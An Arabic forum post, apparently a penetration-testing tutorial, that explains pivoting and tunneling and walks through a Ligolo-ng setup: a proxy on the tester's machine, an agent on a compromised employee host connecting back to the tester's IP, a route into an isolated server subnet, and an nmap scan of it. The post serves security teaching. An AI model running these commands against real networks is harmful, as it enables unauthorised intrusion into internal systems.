Pivoting و Tunneling في اختبار اختراق الشبكات

x32x01
  • بواسطة x32x01 ||
🛡️ يعني إيه Pivoting و Tunneling في اختبار الاختراق؟
في اختبار اختراق الشبكات، أول ما توصل لجهاز واحد جوه شبكة الشركة، كده انت لسه في أول الطريق 😒🚂
المرحلة دي تعتبر أخطر مرحلة، لأن الأنظمة المهمة مش بتكون على نفس الشبكة، وغالبًا بتكون محبوسة جوه شبكات داخلية معزولة.

هنا بيظهر دور Pivoting و Tunneling، وهما اللي بيخلّوا اختبار الاختراق حقيقي وقريب جدًا من سيناريو هجوم واقعي 🔥


🔑 الفكرة ببساطة ومن غير تعقيد​

خلّيك فاكرها كده 👇
  • Pivoting 🧭
    يعني تستخدم الجهاز اللي اخترقته كنقطة عبور توصلك لشبكات أو أنظمة تانية مش باينالك من بره.
  • Tunneling 🚇
    يعني تعمل قناة اتصال تعدي من الجهاز ده، وتخليك تتعامل مع الشبكة الداخلية كأنك قاعد جواها.

تشبيه سريع:​

  • Pivoting = تختار الطريق جوه مدينة مقفولة
  • Tunneling = النفق اللي بيعديك في الطريق ده


⏰ إمتى نحتاج Pivoting فعلًا؟​

السيناريو ده بيحصل كتير جدًا لما:
  • الشبكة تكون متقسمة (Users / Servers / DMZ)
  • في Firewall أو ACL مانعين الوصول المباشر
  • الخدمات الحساسة تكون داخلية بس زي:
    • لوحات تحكم
    • أنظمة HR
    • File Servers
    • Databases
وهنا المختبر لو وقف عند أول جهاز، يبقى كده شغله ناقص ❌


🏢 مثال عملي على شبكة شركة​

خلّينا نفترض إن الشركة عندها:
  • شبكة الموظفين: 192.168.1.0/24
  • شبكة الخوادم: 10.0.0.0/24 (معزولة تمامًا عن الإنترنت)

الوضع الحالي:​

  • انت كمختبر خارجي ❌ مش شايف شبكة الخوادم
  • اخترقت جهاز موظف: 192.168.1.50
  • الجهاز ده يقدر يوصل لشبكة الخوادم من جوه
💡 الحل؟ طبعًا: Pivoting & Tunneling


⚙️ التطبيق العملي خطوة بخطوة باستخدام Ligolo-ng​

أداة Ligolo-ng من أقوى الأدوات في الـ Pivoting و Tunneling 💣

🟢 الخطوة 1: تجهيز الأداة​

على جهازك (المهاجم)
تحميل الأداة من GitHub (هتلاقيها بسهولة)

🟢 الخطوة 2: تشغيل الخادم​

على جهازك (المهاجم): sudo ./proxy -selfcert
📌 كده الخادم شغال ومستني اتصال على البورت 11601

🟢 الخطوة 3: تشغيل العميل على الجهاز المخترق​

على جهاز الموظف المخترق 192.168.1.50: ./agent -connect IP_جهازك:11601 -ignore-cert

🟢 الخطوة 4: تفعيل النفق​

بعد ما الاتصال يتم:
1️⃣ اختار الجلسة session 1
2️⃣ ابدأ النفق start

🟢 الخطوة 5: إضافة مسار شبكة الخوادم​

على جهازك (المهاجم): sudo ip route add 10.0.0.0/24 dev ligolo


✅ النتيجة النهائية​

دلوقتي انت تقدر 💪:
  • توصل لشبكة 10.0.0.0/24 مباشرة
  • تعمل Scan: nmap 10.0.0.0/24
  • تدخل على أي خدمة جوه الشبكة كأنك واحد من الموظفين 👀


🔥 ليه Pivoting و Tunneling مهمين جدًا؟​

Pivoting & Tunneling مش رفاهية ولا تقنيات متقدمة وخلاص، دول قلب اختبار اختراق الشبكات الحقيقي ❤️‍🔥
أول ما تثبت إن: جهاز واحد ممكن يبقى بوابة لباقي الشبكة
ساعتها الاختبار يتحوّل من شغل تقني إلى قيمة أمنية حقيقية تساعد الشركة تقفل الثغرات قبل ما هاكر حقيقي يستغلها 🚨
 
المواضيع ذات الصلة
x32x01
الردود
0
المشاهدات
893
x32x01
x32x01
x32x01
  • x32x01
الردود
0
المشاهدات
30
x32x01
x32x01
x32x01
الردود
0
المشاهدات
666
x32x01
x32x01
x32x01
الردود
0
المشاهدات
729
x32x01
x32x01
x32x01
الردود
0
المشاهدات
590
x32x01
x32x01
الدخول أو التسجيل السريع
نسيت كلمة مرورك؟
إحصائيات المنتدى
المواضيع
2,241
المشاركات
2,452
أعضاء أكتب كود
542
أخر عضو
ِأحمد م.
عودة
أعلى